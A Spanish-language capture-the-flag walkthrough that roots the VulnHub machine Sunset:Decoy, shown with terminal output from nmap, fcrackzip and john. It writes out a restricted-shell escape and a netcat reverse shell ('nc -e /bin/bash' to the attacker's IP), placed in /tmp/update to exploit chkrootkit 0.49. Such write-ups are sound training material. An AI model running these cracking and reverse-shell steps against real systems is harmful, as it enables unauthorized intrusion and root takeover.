[VLN] Sunset:Decoy

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Decoy. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-decoy,505/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~> nmap -A -p- 192.168.1.123 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 10:09 CEST Nmap scan report for 60832e9f188106ec5bcc4eb7709ce592.home (192.168.1.123) Host is up (0.00048s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA) | 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA) |_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519) 80/tcp open http Apache httpd 2.4.38 | http-ls: Volume / | SIZE TIME FILENAME | 3.0K 2020-07-07 16:36 save.zip |_ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Index of / Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds
    Si visitamos la pagina web http://192.168.1.123 vemos que podemos descargar el fichero save.zip. Lo descargamos.
    ~/ctf/vulnhub/decoy > wget http://192.168.1.123/save.zip --2020-07-10 10:12:52-- http://192.168.1.123/save.zip Conectando con 192.168.1.123:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 3123 (3,0K) [application/zip] Grabando a: “save.zip†save.zip 100%[=========================>] 3,05K --.-KB/s en 0s 2020-07-10 10:12:52 (712 MB/s) - “save.zip†guardado [3123/3123]
    Al tratar de descomprimirlo, vemos que esta protegido con password. Usamos fcrackzip y el diccionario rockyou para crackear el password.
    ~/ctf/vulnhub/decoy > fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip 5s found file 'etc/passwd', (size cp/uc 668/ 1807, flags 9, chk 90ab) found file 'etc/shadow', (size cp/uc 434/ 1111, flags 9, chk 834f) found file 'etc/group', (size cp/uc 460/ 829, flags 9, chk 8d07) found file 'etc/sudoers', (size cp/uc 368/ 669, flags 9, chk 1535) found file 'etc/hosts', (size cp/uc 140/ 185, flags 9, chk 8759) found file 'etc/hostname', (size cp/uc 45/ 33, flags 9, chk 8ce8) PASSWORD FOUND!!!!: pw == manuel
    Descomprimimos el fichero con la password que hemos crackeado (manuel).
    ~/ctf/vulnhub/decoy > unzip save.zip group hostname hosts passwd shadow sudoers
    Del fichero shadow, extraemos el ultimo usuario con su "hash/password" y lo guardamos en el fichero tocrack.txt
    ~/ctf/vulnhub/decoy > nano tocrack.txt #contenido 296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7 x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.
    Crackeamos la password con john y el diccionario rockyou.
    ~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status server (96640a3b825115a47b68fc44501c828) 1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s felton..Hunter Use the "--show" option to display all of the cracked passwords reliably Session completed
    La password es "server". Nos logueamos por ssh :)
  • Low Shell
  • ~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established. ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts. 296640a3b825115a47b68fc44501c828@192.168.1.123's password: Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162 -rbash: dircolors: command not found 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
    Al loguearnos vemos que tenemos una "restricted shell". Para escapar de ella nos logueamos de la siguiente forma:
    ~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 "bash --noprofile" 296640a3b825115a47b68fc44501c828@192.168.1.123's password: python3 -c 'import pty; pty.spawn("/bin/bash")'
    Exportamos el PATH para tener un PATH menos limitado.
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export PATH=/bin:usr/bin:$PATH
    Exploramos la carpeta de nuestro usuario.
    <1c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls <1c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls fich logs 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs <@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs <28@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls log.txt <28@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log ---- SNIP ---- pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 2020/06/27 18:56:57 CMD: UID=1000 PID=7645 | php -S 0.0.0.0:8080 2020/06/27 18:56:57 CMD: UID=0 PID=6 | 2020/06/27 18:56:57 CMD: UID=0 PID=222 | /lib/systemd/systemd-journald 2020/06/27 18:56:57 CMD: UID=0 PID=10 | 2020/06/27 18:56:57 CMD: UID=0 PID=1 | /sbin/init 2020/06/27 18:56:58 CMD: UID=0 PID=12385 | -bash 2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz 2020/06/27 18:57:07 CMD: UID=0 PID=12402 | -bash 2020/06/27 18:57:07 CMD: UID=0 PID=12403 | -bash Exiting program... (interrupt) ---- SNIP ----
    Podemos ver que posiblemente este usando chkrootkit-0.49. Si buscamos en google, vemos que hay un exploit[1] para esa version.
  • Privilege Escalation
  • Siguiendo los pasos, creamos el fichero "/tmp/update" para que ejecute una reverse shell.
    296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo "nc -e /bin/bash 192.168.1.111 7777" > update 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x update
    Ponemos nc a la escucha.
    ~ > nc -nlvp 7777 listening on [any] 7777 ...
    Por ultimo, ejecutamos el programa honeypot.decoy que se encuentra en nuestra home y seleccionamos la opcion 5, para que lance el chkrootkit.
    <0832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:5 5 The AV Scan will be launched in a minute or less. --------------------------------------------------
    Al rato... obtenemos la shell de root! :)
    ~ > nc -nlvp 7777 listening on [any] 7777 ... connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282 python3 -c 'import pty; pty.spawn("/bin/bash")' root@60832e9f188106ec5bcc4eb7709ce592:~# id id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt cat root.txt ........::::::::::::.. .......|...............::::::::........ .:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::....... . ........... / \\_ \ | / ...... . ........./\ ...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _// .::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....//// _/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _///// ./ x \\\/ \/ x X \////// \///// / XxX \\/ XxX X //// x -----XxX-------------|-------XxX-----------*--------|---*-----|------------X-- X _X * X ** ** x ** * X _X _X x * x X_ 1c203242ab4b4509233ca210d50d2cc5 Thanks for playing! - Felipe Winsnes (@whitecr0wz)
  • End
  • Y con esto ya seriamos root de la maquina :) [1] https://www.exploit-db.com/exploits/33899